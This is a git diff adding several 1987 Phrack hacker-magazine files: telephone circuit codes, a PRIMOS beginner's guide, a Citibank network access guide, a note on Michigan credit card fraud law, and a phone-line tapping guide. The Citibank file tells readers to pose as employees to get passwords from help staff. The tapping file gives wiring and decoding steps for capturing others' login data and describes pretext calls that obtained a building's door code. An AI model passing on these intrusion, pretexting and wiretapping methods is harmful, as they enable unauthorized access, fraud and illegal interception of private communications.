+VF- Commercial television (full time)
+VH- Commercial television (part time)
+VM- Control/Remote metering-voice grade
+VO- International overseas television
+VR- Non-commercial television (7003,7004)
+WC- Special 800 surface trunk
+WD- Special WATS trunk (OUT)
+WI- 800 surface trunk
+WO- WATS line (OUT)
+WS- WATS trunk (OUT)
+WX- 800 service line
+WY- WATS trunk (2-way)
+WZ- WATS line (2-way)
+ZA- Alarm circuits
+ZC- Call and talk circuits
+ZE- Emergency patching circuits
+ZF- Order circuits, facility
+ZM- Measurement and recording circuits
+ZP- Test circuit, plant service center
+ZQ- Quality and management circuits
+ZS- Switching, control and transfer circuits
+ZT- Test circuits, central office
+ZV- Order circuits, service
+
+SERVICE CODES FOR LATA ACCESS
+---------------------------------------------------
+HC- High capacity 1.544 mb/ps
+HD- High capacity 3.152 mb/ps
+HE- High capacity 6.312 mb/ps
+HF- High capacity 6.312
+HG- High capacity 274.176 mb/s
+HS- High capacity subrate
+LB- Voice-non switched line
+LC- Voice-switched line
+LD- Voice-switched trunk
+LE- Voice and tone-radio landline
+LF- Data low-speed
+LG- Basic data
+LH- Voice and data-PSN access trunk
+LJ- Voice and data SSN access
+LK- Voice and data-SSN-intermachine trunk
+LN- Data extension, voice grade data facility
+LP- Telephoto/Facsimile
+LQ- Voice grade customized
+LR- Protection relay-voice grade
+LZ- Dedicated facility
+MQ- Metallic customized
+NQ- Telegraph customized
+NT- Protection alarm-metallic
+NU- Protection alarm
+NV- Protective relaying/Telegraph grade
+NW- Telegraph grade facility-75 baud
+NY- Telegraph grade facility- 150 baud
+PE- Program audio, 200-3500 hz
+PF- Program audio, 100-5000 hz
+PJ- Program audio, 50-8000 hz
+PK- Program audio, 50-15000 hz
+PQ- Program grade customized
+SB- Switched access-standard
+SD- Switched access-improved
+SE- Special access WATS-access-std
+SF- Special access WATS access line improved
+SJ- Limited switched access line
+TQ- Television grade customized
+TV- TV Channel one way 15khz audio
+TW- TV Channel one way 5khz audio
+WB- Wideband digital, 19.2 kb/s
+WE- Wideband digital, 50 kb/s
+WF- Wideband digital, 230.4 kb/s
+WH- Wideband digital, 56 kb/s
+WJ- Wideband analog, 60-108 khz
+WL- Wideband analog 312-552 khz
+WN- Wideband analog 10hz-20 khz
+WP- Wideband analog, 29-44 khz
+WR- Wideband analog 564-3064 khz
+XA- Dedicated digital, 2.4 kb/s
+XB- Dedicated digital, 4.8 kb/s
+XG- Dedicated digital, 9.6 kb/s
+XH- Dedicated digital 56. kb/s
+
+
+
+Now the last two positions of real importance, 5 & 6 translate thusly:
+
+Modifier Character Position 5
+------------------------------
+
+INTRASTATE	    INTERSTATE
+-------------------------------------
+   A			B	   Alternate data & non data
+-------------------------------------
+   C				  Customer controlled service
+-------------------------------------
+   D			E	   Data
+-------------------------------------
+   N			L	   Non-data operation
+-------------------------------------
+   P				  Only offered under intra restructured
+				      private line (RPL) tariff
+-------------------------------------
+   S			T	   Simultaneous data & non-data
+-------------------------------------
+   F				  Interexchange carriers is less than 50%
+-------------------------------------
+			  G	   Interstate carrier is more than 50%
+				      usage
+==============================================================================
+
+MODIFIER CHARACTER POSITION 6
+--------------------------------------------------------------
+
+  TYPE OF SERVICE	Intra LATA
+--------------------------------------
+ALL EXCEPT US GOVT	US GOVERNMENT
+--------------------------------------
+       T		   M	  Circuit is BOC customer to BOC customer
+				      all facilities are TELCO provided
+--------------------------------------
+       C		   P	  Circuit is BOC/BOC and part of
+				      facilities or equipment is telco
+				      provided
+--------------------------------------
+       A		   J	  Circuit is BOC/BOC all electrically
+				      connected equip is customer provided
+--------------------------------------
+       L		   F	  Circuit terminates at interexchange
+				      carrier customers location
+--------------------------------------
+       Z			      Official company service
+--------------------------------------
+			  Interlata
+       S		   S	  Circuit terminates at interexchange
+				      carriers point of term (POT)
+--------------------------------------
+       V		   V	  Circuit terminates at an interface of a
+				      radio common carrier (RCC)
+--------------------------------------
+       Z			      Official company service
+--------------------------------------
+
+			   Corridor
+       Y		   X	  Corridor circuit
+--------------------------------------
+			   International
+       K		   H	  Circuit has at least 2 terminations in
+				      different countries
+--------------------------------------
+			   Interexchange carrier
+       Y		   X	  Transport circuit between interexchange
+				      carrier terminals.
+----------------------------------------
+
+So 64FDDV would be a private line data circuit terminating at a	radiocommon
+carrier.  Other examples can be decoded likewise.
+
+Enjoy this information as much as I've had finding it.
+
+    -= The Mad Phone-man =-
diff --git a/phrack16/3.txt b/phrack16/3.txt
new file mode 100644
index 0000000..1268dd8
--- /dev/null
+++ b/phrack16/3.txt
@@ -0,0 +1,289 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 3 of 12 =====
+
+==========================================
+====	Cosmos Kid Presents...     ====
+====   A Hacker's Guide To:  PRIMOS   ====
+====		Part I	      ====
+====	(c) 1987 by Cosmos Kid	====
+==========================================
+
+Author's Note:
+--------------
+This file is the first of two files dealing with PRIMOS and its operations.
+The next file will be in circulation soon so be sure to check it out at any
+good BBS.
+
+
+Preface:
+--------
+This file is written in a form to teach beginners as well as experienced
+Primos users about the system. It is written primarily for beginners however.
+PRIMOS, contrary to popular belief can be a very powerful system if used
+correctly.  I have  outlined some  VERY BASIC  commands and  their use in this
+file along with some extra commands, not so BASIC.
+
+
+Logging On To A PRIMOS:
+-----------------------
+A PRIMOS system is best recognized by its unusual prompts. These are: 'OK',
+and 'ER!'.  Once connected, these are not the prompts you get.	The System
+should identify itself with a login such as:
+
+Primenet V2.3
+-or-
+Primecom Network
+
+The  system then  expects some	input from  you,preferably:  LOGIN.  You will
+then be asked to enter	your user  identification and  password as  a security
+measure.  The login onto a PRIMOS is as follows:
+
+CONNECT
+Primenet V 2.3 (system)
+LOGIN<CR>      (you)
+User id?       (system)
+AA1234	 (you)
+Password?      (system)
+KILLME	 (you)
+OK,	    (system)
+
+
+Preceding the OK, will be the systems opening message.	Note that if you fail
+to type login once connected, most other commands are ignored and the system
+responds with:
+
+Please Login
+ER!
+
+
+Logging Off Of A PRIMOS:
+------------------------
+If at any time you get bored with Primos, just type 'LOGOFF' to leave the
+system.	Some systems have a TIMEOUT feature implemented meaning that if you
+fail to type anything for the specified amount of time the system will
+automatically log you out, telling you something like:
+
+Maximum Inactive Time Limit Exceeded
+
+
+System Prompts:
+---------------
+As stated previously, the prompts 'ER!' and 'OK,' are used on Primos. The
+'OK,' denotes that last command was executed properly and it is now waiting
+for your next command. The 'ER!' prompt denotes that you made an error in
+typing	your last  command.  This  prompt is  usually  preceded	by  an	error
+message.
+
+
+Special Characters:
+-------------------
+Some terminals have certain characteristics that are built in to the terminal.
+key
+
+CONTROL-H
+Deletes the last character typed.
+
+
+Other Special Characters:
+-------------------------
+RETURN:	The return key signals PRIMOS that you have completed typing a
+	 command and that you are ready for PRIMOS to process the command.
+
+BREAK/CONTROL-P:  Stops whatever is currently being processed in memory and
+		  will return PRIMOS to your control.  To restart a process,
+		  type:
+		  START (abbreviated with S).
+
+CONTROL-S:  Stops the scrolling of the output on your terminal for viewing.
+
+CONTROL-Q:  Resumes the output scrolling on your terminal for inspection.
+
+SEMICOLON ';':	The logical end of line character.  The semicolon is used to
+		enter more than one command on one line.
+
+Getting Help:
+-------------
+You can get on-line information about the available PRIMOS commands by using
+the 'HELP' command.  The HELP system is keyword driven.	That is, all
+information is stored under keywords that indicate the content of the help
+files.	This is similar to VAX.	Entering the single command 'HELP' will enter
+the HELP sub-system and will display an informative page of text.  The next
+page displayed will provide you with a list of topics and their keywords.
+These topics include such items as PRIME, RAP, MAIL, and DOC.  If you entered
+the MAIL keyword, you would be given information concerning the mail sub-
+system available to users on P simply enter PRIME to obtain information on all
+PRIMOS commands.  You could then enter COPY to obtain information on that
+specific topic.
+
+
+Files And Directories:
+----------------------
+The name of a file or sub-directory may have up to 32 characters.  The
+filename may contain any of the following characters, with the only
+restriction being that the first character of the filename may not be a digit.
+Please note that BLANK spaces are NOT allowed ANYWHERE:
+
+A-Z .....alphabet
+0-9 .....numeric digits
+&   .....ampersand
+#   .....pound sign
+$   .....dollar sign
+-   .....dash/minus sign
+*   .....asterisk/star
+.   .....period/dot
+/   .....slash/divide sign
+
+
+Naming Conventions:
+-------------------
+There are very few restrictions on the name that you may give a file.
+However, you should note that many of the compilers (language processors) and
+commands on the PRIME will make certain assumptions if you follow certain
+guidelines. File name suffixes help to identify the file contents with regard
+to the language the source code was written in and the contents of the file.
+For instance, if you wrote a PL/1 program and named the file containing the
+source code 'PROG1.PL1' (SEGmented loader) would take the binary file, link
+all the binary libraries that you specify and produce a file named
+'PROG1.SEG', which would contain the binary code necessary to execute the
+program.  Some common filename suffixes are:  F77, PAS, COBOL, PL1G, BASIC,
+FTN, CC, SPIT (source  files).	These all  denote  separate languages  and get
+into more advanced programming on PRIMOS.  (e.g. FTN=Fortran).
+
+BIN=the binary code produced by the compiler
+LIST=the program listing produced by the compiler
+SEG=the linked binary code produced by SEG
+
+Some files which do not use standard suffixes may instead use the filename
+prefixes to identify the contents of the file.	Some common filename prefixes
+are:
+
+B  Binary code produced by the compiler
+L  source program Listing
+C  Command files
+$  Temporary work files (e.g. T$0000)
+#  Seg files
+
+
+Commands For File Handling:
+----------------------------
+PRIMOS has several commands to control and access files and file contents.
+These commands can be used to list the contents of files and directories, and
+to copy, add, delete, edit, and print the contents of files.  The capitalized
+letters of each are deleted.  A LIST must be enclosed in parenthesis.
+
+Close arg	....Closes the file specified by 'arg'.  'Arg' could also be
+		 a list of PRIMOS file unit numbers, or the word 'ALL' which
+		 closes all open files and units.
+
+LIMITS		....Displays information about the login account, including
+		 information about resources allocated and used, grantor, and
+		 expiration date.
+
+Edit Access	....Edits the Access rights for the named directories and
+		 files.
+
+CName arg1 arg2	....Changes the Name of 'arg1' to 'arg2'.  The arguments can
+		 be files or directories.
+
+LD		....The List Directory command has several arguments that
+		 allow for controlled listing format and selection of entries.
+
+Attach arg	....allows you to Attach to the directory 'arg' with the
+		 access rights specified in the directory Access Control List.
+
+DOWN <arg>	....allows you to go 'DOWN into' a sub-ufd (directory).  You
+		 can specify which one of several sub-ufds to descend into
+		 with the optional 'arg'.
+
+UP <arg>	 ....allows you to go 'UP into' a higher ufd (directory).  You
+		 can specify which one of several to climb into with the
+		 optional 'arg'.
+
+WHERE		....Displays what the current directory attach point is and
+		 your access rights.
+
+CREATE arg	....CREATES a new sub-directory as specified by 'arg'.
+
+COPY arg1 arg2	....COPIES the file or directory specified by 'arg1' into a
+		 file by the same name specified by 'arg2'.  Both 'arg1' and
+		 'arg2' can be filename with the SPOOL command, whose format
+		 is:
+
+SPOOL filename -AT destination
+		 where filename is the name of the file you want printed, and
+		 destination is the name of the printer where you want the
+		 file printed.	For example if you want the file 'HACK.FTN'
+		 printed at the destination 'LIB' type:
+
+SPOOL HACK.FTN -AT LIB
+
+PRIMOS then gives you some information telling you that the file named was
+SPOOLed and the length of the file in PRIMOS records. To see the entries in
+the SPOOL queue, type:
+
+SPOOL -LIST
+
+PRIMOS then lists out all the files waiting to be printed on the printers on
+your login system. Also included in this information will be the filename of
+the files waiting to print, the login account name of the user who SPOOLed the
+file, the time that the file was SPOOLed, the size of the file in PRIMOS
+records, and the printer name where the file is to print.
+
+
+Changing The Password Of An Account:
+------------------------------------
+If you wish to change the password to your newly acquired account you must use
+the 'CPW' command (Change PassWord).  To do this enter the current password on
+the command line followed by RETURN.  PRIMOS will then prompt you for your
+desired NEW password and then ask you to confirm your NEW password.  To change
+your password of 'JOE' to 'SCHMOE' then type:
+
+OK,		(system)
+CPW JOE		(you)
+New Password?	(system)
+
+You can save a copy of your terminal session by using the COMO (COMmand
+Output) command.  When you type:
+
+COMO filename
+
+Everything which is typed or displayed on your terminal is saved (recorded)
+into the filename  on the command line (filename).  If a file by the same name
+exists, then that file will be REPLACED with NO WARNING GIVEN!	When you have
+finished doing whatever it was you wanted a hardcopy of, you type:
+
+COMO -End
+
+which will stop recording your session and will close the COMO file. You can
+now print the COMO file using the SPOOL command as stated earlier.
+
+Conclusion:
+-----------
+This  concludes	this  first  file on PRIMOS.  Please  remember this  file  is
+written primarily for beginners, and some of  the text may have seemed BORING!
+However, this filewaswrittenin	a verbose fashion to FULLYINTRODUCEPRIMOS
+to beginners.  Part II will deal with more the several languages on PRIMOS and
+some other commands.
+
+
+Author's Endnote:
+-----------------
+I would like to thank the following people for the help in writing this file:
+
+AMADEUS (an oldie who is LONG GONE!)
+The University Of Kentucky
+State University Of New York (SUNY) Primenet
+
+And countless others.....
+
+Questions, threats, or suggestions to direct towards me, I can be found on any
+of the following:
+
+The Freeworld ][.........301-668-7657
+Digital Logic............305-395-6906
+The Executive Inn........915-581-5146
+OSUNY BBS................914-725-4060
+
+	-=*< Cosmos Kid >*=-
+
+========================================
diff --git a/phrack16/4.txt b/phrack16/4.txt
new file mode 100644
index 0000000..72618cc
--- /dev/null
+++ b/phrack16/4.txt
@@ -0,0 +1,248 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 4 of 12 =====
+
+
+Hacking the Global Telecommunications Network
+Researched and written by:  The Kurgan
+Compiled on 10/5/87
+
+
+Network Procedure Differences
+
+The Global Telecommunications Network (GTN) is Citibanks's international data
+network, which allows Citicorp customers and personnel to access Citibank's
+worldwide computerized services.
+
+Two different sign on procedures exist: Type A and Type B.  All users, except
+some  in  the U.S., must use Type B.  (U.S. users: the number  you dial into
+and  the  Welcome  Banner  you	receive	determine  what  sign-on procedure to
+follow.)  Welcome banners are as follows:
+
+TYPE A:
+WELCOME TO CITIBANK. PLEASE SIGN ON.
+XXXXXXXX
+
+@
+PASSWORD =
+
+@
+
+TYPE B:
+PLEASE ENTER YOUR ID:-1->
+PLEASE ENTER YOUR PASSWORD:-2->
+
+CITICORP (CITY NAME). KEY GHELP FOR HELP.
+  XXX.XXX
+ PLEASE SELECT SERVICE REQUIRED.-3->
+
+
+Type A User Commands
+
+User commands are either instructions or information you send to the network
+for it to follow.  The commands available are listed below.
+
+User Action:  Purpose:
+
+@ (CR)	To put you in command mode (mode in which you can put
+	 your currently active service on hold and ask the network
+	 for information, or log-off the service).  (NOTE: This
+	 symbol also serves as the network prompt; see Type A
+	 messages.)
+
+BYE (CR)  To leave service from command mode.
+
+Continue (CR)  To return to application from command mode (off hold)
+
+D (CR)			To leave service from command mode.
+
+ID			To be recognized as a user by the network (beginning of
+			sign on procedure), type ID, then a space and your
+			assigned network ID.  (Usually 5 or 6 characters long)
+
+Status (CR)		To see a listing of network address (only from @
+			prompt).  You need this address when "reporting a
+			problem."
+
+Type A messages
+
+The network displays a variety of messages on your screen which either require
+a user command or provide you with information.
+
+Screen shows:  Explanation:
+
+@   Network prompt -- request for Network ID.
+
+BAD PASSWORD  Network does not except your password.
+
+<address> BUSY		The address is busy, try back later.
+
+
+WELCOME TO CITIBANK.	Network welcome banner.	Second line provides address
+PLEASE SIGN ON.		# to be used when reporting "problems."
+XXX.XXX
+
+<address> ILLEGAL	You typed in an address that doesn't exist.
+
+<address> CONNECTED	Your connection has been established.
+
+DISCONNECTED		Your connect has been disconnected.
+
+NOT CONNECTED		You're not connected to any service at the time.
+
+NUI REQUIRED		Enter your network user ID.
+
+PASSWORD =		Request for your assigned password.
+
+STILL CONNECTED		You are still connected to the service you were using.
+
+?			Network doesn't understand your entry.
+
+
+Type B User Commands and Messages
+
+Since the Type B procedure is used with GTN dial-ups, it requires fewer
+commands to control the network.  There is only 1 Type B command.  Break plus
+(CR) allows you to retain connection to one service, and connect with another.
+
+
+Screen Shows:  Explanation:
+
+CITICORP (CITY NAME).	Network Welcome banner.	Type in service address.
+ PLEASE SELECT SERVICE
+
+COM   Connection made.
+
+DER   The port is closed out of order, or no open routes are
+      available.
+
+DISCONNECTED  You have disconnected from the service and the network.
+
+ERR   Error in service selected.
+
+INV   Error in system.
+
+MOM   Wait, the connection is being made.
+
+NA    Not authorized for this service.
+
+NC    Circuits busy, try again.
+
+NP    Check service address.
+
+OCC   Service busy, try again.
+
+
+Sign-on Procedures:
+
+  There are two types of sign on procedures.  Type A and Type B.
+
+
+Type A:
+
+To log onto a system with type A logon procedure, the easiest way is through
+Telenet.  Dial your local Telenet port.	When you receive the "@" prompt, type
+in the Type-A service address (found later in the article) then follow the
+instructions from there on.
+
+  Type-B:
+    Dial the your GTN telephone #, then hit return twice.  You will then see:
+
+"PLEASE ENTER YOUR ID:-1->"
+
+Type in a network ID number and hit return.
+
+    You will then see
+
+"PLEASE ENTER YOUR PASSWORD:-2->"
+
+     Type in Network Password and hit return.
+
+    Finally you will see the "CITICORP (city name)" welcome banner, and it
+will ask you to select the service you wish to log onto.  Type the address and
+hit return.  (A list of addresses will be provided later)
+
+Trouble Shooting:
+
+    If you should run into any problems, the Citicorp personnel will gladly
+help their "employees" with any questions.  Just pretend you work for Citibank
+and they will give you a lot.  This has been tried and tested.	Many times,
+when you attempt to log on to a system and you make a mistake with the
+password, the system will give you a number to call for help.  Call it and
+tell them that you forgot your pass or something.  It usually works, since
+they don't expect people to be lying to them.  If you have any questions about
+the network itself, call 305-975-5223.	It is the Technical Operations Center
+(TOC) in Pompano, Florida.
+
+Dial-Ups:
+
+    The following list of dial-ups is for North America.  I have a list of
+others, but I don't think that they would be required by anyone.  Remember:
+Dial-ups require Type-B log-on procedure.  Type-A is available on systems
+accessible through Telenet.
+
+Canada Toronto	416-947-2992     (1200 Baud V.22 Modem Standard)
+U.S.A. Los Angeles   213-629-4025     (300/1200 Baud U.S.A. Modem Standard)
+       Jersey City   201-798-8500
+       New York City 212-269-1274
+		     212-809-1164
+
+Service Addresses:
+
+     The following is a VERY short list of just some of the 100's of service
+addresses.  In a later issue I will publish a complete list.
+
+Application Name:   Type-A  Type-B
+
+CITIADVICE    2240001600 CADV
+CITIBANKING ATHENS   2240004000 :30
+CITIBANKING PARIS   2240003300 :33
+CITIBANKING TOKYO   2240008100	:81
+CITICASH MANAGER
+  INTERNATIONAL 1 (NAFG CORP)  2240001200      CCM1
+  INTERNATIONAL 7 (DFI/WELLS FARGO) 2240013700 CCM7
+COMPMARK ON-LINE   2240002000	CS4
+ECONOMIC WEEK ON-LINE	2240011100	FAME1
+INFOPOOL/INFOTEXT   2240003800	IP
+
+EXAMPLE OF LOGON PROCEDURE:
+
+THE FOLLOWING IS THE BUFFERED TEXT OF A LOG-ON TO CITIBANKING PARIS THROUGH
+TELENET.
+
+
+
+CONNECT 1200
+TELENET
+216 13.41
+
+TERMINAL=VT100
+
+@2240003300
+
+223 90331E CONNECTED
+
+ENTER TYPE NUMBER OR RETURN
+
+TYPE B IS BEEHIVE DM20
+TYPE 1 IS DEC VT100
+TYPE A IS DEC VT100 ADV VIDEO
+TYPE 5 IS DEC VT52
+TYPE C IS CIFER 2684
+TYPE 3 IS LSI ADM 3A
+TYPE L IS LSI ADM 31
+TYPE I IS IBM 3101
+TYPE H IS HP 2621
+TYPE P IS PERKIN ELMER 1200
+TYPE K IS PRINTER KEYBOARD
+TYPE M IS MAI BASIC 4
+TYPE T IS TELEVIDEO 9XX
+TYPE V IS VOLKER CRAIG 4404
+TYPE S IS SORD MICRO WITH CBMP
+RELEASE BSC9.5 - 06JUN85
+FOR 300 BAUD KEY ! AND CARRIAGE RETURN
+CONFIG.	K1.1-I11H-R-C-B128
+ENTER TYPE NUMBER OR RETURN K
+
+CONNECTED TO CITIBANK PARIS - CBP1 ,PORT 5
+
+Have fun with this info, and remember, technology will rule in the end.
diff --git a/phrack16/5.txt b/phrack16/5.txt
new file mode 100644
index 0000000..9806ffa
--- /dev/null
+++ b/phrack16/5.txt
@@ -0,0 +1,142 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 5 of 12 =====
+
+----------------------------------------------------------------------------
+|		  The Laws Governing Credit Card Fraud			|
+|									  |
+|			Written by Tom Brokaw				|
+|			 September 19, 1987				|
+|									  |
+|			Written exclusively for:			   |
+|			  Phrack Magazine				 |
+|									  |
+----------------------------------------------------------------------------
+		(A Tom Brokaw/Disk Jockey Law File Production)
+
+
+Introduction:
+------------
+
+     In this article, I will try to explain the laws concerning the illegal
+use of credit cards.  Explained will be the Michigan legislative view on the
+misuse and definition of credit cards.
+
+
+Definition:
+----------
+
+     Well, Michigan Law section 157, defines a credit card as  "Any instrument
+or device which is sold, issued or otherwise distributed by a business
+organization identified thereon for obtaining goods, property, services or
+anything of value."  A credit card holder is defined as: 1) "The person or
+organization who requests a credit card and to whom or for whose benefit a
+credit card is subsequently issued" or	2) "The person or organization to whom
+a credit  card was  issued and	who uses a credit card whether the issuance of
+the credit card was requested or not."	In other words, if the company or
+individual is issued a card, once using it, they automatically agree to all
+the laws and conditions that bind it.
+
+
+Stealing, Removing, Retaining or Concealment:
+--------------------------------------------
+
+     Michigan Law states, that it is illegal to "steal, knowingly take or
+remove a credit card from a card holder." It also states that it is wrongful
+to "conceal a credit card  without the consent of the card holder."  Notice
+that it doesn't say anything about carbons  or numbers acquired from BBSes,
+but I think that it could be considered part of the laws governing the access
+of a persons account without the knowledge of the cardholder, as described
+above.
+
+
+Possession with Intent to Circulate or Sell
+-------------------------------------------
+
+     The law states that it is illegal to possess or have under one's control,
+or receive a credit card if his	intent is to circulate or sell the card.  It
+is also illegal to deliver, circulate or sell a credit card, knowing that such
+a possession, control or receipt without the cardholders consent, shall be
+guilty of a FELONY.  Notice again, they say nothing about possession of
+carbons or numbers directly.  It also does not clearly state what circulation
+or possession is, so we can only stipulate.  All it says is that possession of
+a card (material plastic) is illegal.
+
+
+Fraud, forgery, material alteration, counterfeiting.
+----------------------------------------------------
+
+     However, it might not be clearly illegal to possess a carbon or CC
+number.	It IS illegal to defraud  a credit card holder.   Michigan law states
+that any person who, with intent to defraud, forge, materially alter or
+counterfeit a credit card, shall be guilty of a felony.
+
+
+Revoked or cancelled card, use with intent to defraud.
+------------------------------------------------------
+
+    This states that "Any person who knowingly and with intent to defraud for
+the purpose of obtaining goods, property or services or anything of value on a
+credit card which has been revoked or cancelled or reported stolen by the
+issuer or issuee, has been notified of the cancellation by registered or
+certified mail or by another personal service shall be fined not more than
+$1,000 and not imprisoned not more than a year, or both.  However, it does not
+clearly say if it is a felony or misdemeanor or civil infraction.  My guess is
+that it would be dependant on the amount and means that you used and received
+when  you  defraud  the	company.   Usually,  if  it is	under	$100,  it is a
+misdemeanor  but if it is over $100, it is a felony.  I guess they figure that
+you should know these things.
+
+
+The People of The State of Michigan vs. Anderson     (possession)
+------------------------------------------------
+
+     On April 4, 1980, H. Anderson attempted to purchase a pair of pants at
+Danny's Fashion Shops, in the Detroit area.  He went up to the cashier to pay
+for the pants and the cashier asked him if he had permission to use the credit
+card.  He said "No, I won it last night in a card game".  The guy said that I
+could purchase $50 dollars worth of goods to pay back the debt.	At the same
+time, he presumed the card to be a valid one and not stolen.  Well, as it
+turned out it was stolen but he had no knowledge of this.  Later, he went to
+court and pleased guilty of attempted possession of a credit card of another
+with intent or circulate or sell the same.  At the guilty hearings, Mr.
+Anderson stated that the credit card that he attempted to use had been
+acquired by him in payment of a gambling debt and assumed that the person was
+the owner. The trial court accepted his plea of guilty.	At the sentencing,
+Mr. Anderson, denied that he had any criminal intent.  Anderson appealed the
+decision stating that the court had erred by accepting his plea of guilty on
+the basis of insufficient factual data.	Therefore, the trial court should not
+have convicted him of attempted possession and reversed the charges.
+
+
+The People of the State of Michigan vs. Willie Dockery
+------------------------------------------------------
+
+     On June 23, 1977, Willie Dockery attempted to purchase gas at a Sears gas
+station	by  using  a  stolen  credit  card. The  attendant noticed  that his
+driver's license  picture was  pasted on  and  notified	the police.   Dockery
+stated that he had found the credit  card and the license at an intersection,
+in the city of Flint.  He admitted that	he knowingly used the credit card and
+driver's license without the consent of the owner but he said that he only had
+purchased  gasoline  on	the  card.  It	turns	out  that  the credit card and
+driver's  license was  stolen from a man, whose grocery store had been robbed.
+Dockery said  that he  had no knowledge of the robbery and previous charges on
+the cardwhich totalled$1,373.21.  He admitted that he did paste his picture
+on the driver's license.  Butagain the court screws up, they receive evidence
+that the defendant had a record of felonies dating back to when he was sixteen
+and then assumed that  he was guilty on	the basis of his prior offenses.  The
+judge later said that  the present  sentence could  not stand in this court so
+the case was referred to another court.
+
+
+Conclusion
+----------
+
+     I hope that I have given you a better understanding about the law, that
+considers the illegal aspects of using credit cards.  All this information was
+taken from The Michigan Compiled Laws Annotated Volume 754.157a-s and from The
+Michigan Appeals Report.
+
+In my next file I will talk about the laws concerning Check Fraud.
+
+
+					     -Tom Brokaw
diff --git a/phrack16/6.txt b/phrack16/6.txt
new file mode 100644
index 0000000..c763ac7
--- /dev/null
+++ b/phrack16/6.txt
@@ -0,0 +1,197 @@
+		===== Phrack Magazine presents Phrack 16 =====
+			   ===== File 6 of 12 =====
+
+******************************************************************************
+*									    *
+*			 Tapping Telephone Lines			    *
+*									    *
+*			      Voice or Data				 *
+*									    *
+*			For Phun, Money, and Passwords			*
+*									    *
+*		   Or How to Go to Jail for a Long Time.		    *
+*									    *
+******************************************************************************
+
+Written by Agent Steal 08/87
+
+
+  Included in this file is...
+
+      * Equipment needed
+
+      * Where to buy it
+
+      * How to connect it
+
+      * How to read recorded data
+
+
+  But wait!!  There's more!!
+
+      * How I found a Tymnet node
+
+      * How I got in
+
+
+
+*************
+THE EQUIPMENT
+*************
+
+    First  thing you  need  is	an  audio  tape	recorder.   What you  will be
+recording, whether  it be  voice or  data, will	be in an analog audio format.
+>From now  on, most references	will be	towards data recording.  Most standard
+cassette recorders will work  just fine.  However,  you are limited  to 1 hour
+recording time	per side.   This can  present a problem in some situations.  A
+reel to reel can also be used.	The limitations here are size and availability
+of A.C.	Also, some  reel to  reels lack  a remote  jack that will be used to
+start  and stop	the recorder  while the  line is being	used.	This  may not
+present	a problem.   More later.  The two  types of recorders I would advise
+staying away from (for data) are the micro cassette recorders and the standard
+cassette recorders that have been modified for 8 to 10 hour record time.  The
+speed  of these	units is too unstable.	The next item you need, oddly enough,
+is  sold by  Radio Shack  under the  name "Telephone  recording control"  part
+# 43-236 $24.95.  See page 153 of the 1987 Radio Shack catalog.
+
+
+
+*****************
+HOW TO CONNECT IT
+*****************
+
+  The Telephone recording control (TRC) has 3 wires coming out of it.
+
+  #1 Telco wire with modular jack.  Cut this and replace with alligator clips.
+
+  #2 Audio wire with miniature phone jack (not telephone).  This plugs
+     into the microphone level input jack of the tape recorder.
+
+  #3 Audio wire with sub miniature phone jack.	This plugs into the "REM"
+     or remote control jack of the tape recorder.
+
+    Now all you need to do is find the telephone line, connect the alligator
+clips, turn the recorder on, and come back later.  Whenever the line goes off
+hook, the recorder starts.  It's that simple.
+
+
+
+****************
+READING THE DATA
+****************
+
+    This is the tricky part.  Different modems and different software respond
+differently but there are basics.  The modem should be connected as usual to
+the telco line and computer.  Now connect the speaker output of the tape
+player directly to the telephone line.	Pick up the phone and dial the high
+side of a loop so your line doesn't make a lot of noise and garble up your
+data.  Now, command your modem into the answer mode and press play.  The tape
+should be lined up at the beginning of the recorded phone call, naturally, so
+you can see the login.	Only one side of the transmission between the host and
+terminal can be monitored at a time.  Going to the originate mode you will see
+what the host transmitted.  This will include the echoes of the terminal. Of
+course the password will be echoed as ####### for example, but going to the
+answer mode will display exactly what the terminal typed.  You'll understand
+when you see it.  A couple of problems you might run into will be hum and
+garbage characters on the screen.  Try connecting the speaker output to the
+microphone of the hand set in your phone.  Use a 1 to 1 coupling transformer
+between the tape player input and the TRC audio output.	These problems are
+usually caused when using A.C. powered equipment.  The common ground of this
+equipment interferes with the telco ground which is D.C. based.
+
+    I was a little reluctant to write this file because I have been
+unsuccessful in reading any of the 1200 baud data I have recorded.  I have
+spoke with engineers and techs.	Even one of the engineers who designs modems.
+All of them agree that it IS possible, but can't tell me why I am unable to do
+this.  I believe that the problems is in my cheap ass modem.  One tech told me
+I needed a modem with phase equalization circuitry which is found in most
+expensive 2400 baud modems.  Well one of these days I'll find $500 lying on
+the street and I'll have nothing better to spend it on!	Ha!  Actually, I have
+a plan and that's another file.....
+
+    I should point out one way of reading 1200 baud data.  This should work in
+theory, however, I have not attempted it.
+
+    Any fully Hayes compatible modem has a command that shuts off the carrier
+and allows you to monitor the phone line.  The command is ATS10.  You would
+then type either answer or originate depending on who you wanted to monitor.
+It would be possible to write a program that records the first 300 or so
+characters then writes it to disk, thus allowing unattended operation.
+
+**************
+HOW CRAZY I AM
+**************
+
+  PASSWORDS GALORE!!!!
+
+    After numerous calls to several Bell offices, I found the one that handled
+Tymnet's account.  Here's a rough transcript:
+
+Op:  Pacific Bell priority customer order dept.	How may I help you?
+Me:  Good Morning, this is Mr. Miller with Tymnet Inc.	We're interested in
+     adding some service to our x town location.
+Op:  I'll be happy to help you Mr. Miller.
+Me:  I need to know how many lines we have coming in on our rotary and if we
+     have extra pairs on our trunk.  We are considering adding ten additional
+     lines on that rotary and maybe some FX service.
+Op:  Ok....What's the number this is referenced to?
+Me:  xxx-xxx-xxxx (local node #)
+Op:  Hold on a min....Ok bla, bla, bla.
+
+    Well you get the idea.  Anyway, after asking her a few more unimportant
+questions I asked her for the address.	No problem, she didn't even hesitate.
+Of course this could have been avoided if the CN/A in my area would give out
+addresses, but they don't, just listings.  Dressed in my best telco outfit,
+Pac*Bell baseball cap, tool belt and  test set, I was out the door.  There it
+was, just  an office  building, even  had  a  computer	store  in  it.	After
+exploring the building for awhile, I found it.	A large steel door with a push
+button lock.  Back to the phone.  After finding the  number where  the service
+techs were I called it and talked to the tech manager.
+
+Mgr:  Hello this is Joe Moron.
+Me:   Hi this is Mr. Miller (I like that name) with Pacific Bell.  I'm down
+      here at your x town node and we're having problems locating a gas leak
+      in one of our Trunks.  I believe our trunk terminates pressurization in
+      your room.
+Mgr:  I'm not sure...
+Me:   Well could you have someone meet me down here or give me the entry code?
+Mgr:  Sure the code is 1234.
